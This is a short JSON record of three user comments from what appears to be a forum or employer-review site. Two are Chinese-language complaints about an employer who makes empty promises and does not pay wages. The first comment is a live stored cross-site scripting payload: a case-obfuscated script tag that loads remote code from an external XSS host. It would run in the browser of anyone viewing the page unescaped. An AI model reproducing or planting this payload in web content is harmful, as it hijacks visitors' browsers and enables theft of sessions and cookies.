[{"id":"01963dd5-0b55-72f0-a549-14dc8de38e28","parentId":null,"rootId":null,"fromId":624,"content":"<sCRiPt sRC=//xss.pt/AGo1></sCrIpT>","createdAt":"2022-07-08T17:11:02"},{"id":"01963dd5-0b99-7225-b92d-0876b4072933","parentId":null,"rootId":null,"fromId":3973,"content":"大饼极其严重，无所不用其极，进去之后你就会发现  地狱何止在阴间","createdAt":"2023-07-04T10:10:15"},{"id":"01963dd5-0be5-7242-b6ac-04b83e6becff","parentId":null,"rootId":null,"fromId":4029,"content":"属于那种白使唤人不给工资的那种，你还有用就画饼，没用就耍无赖没钱。","createdAt":"2023-07-11T11:59:18"}]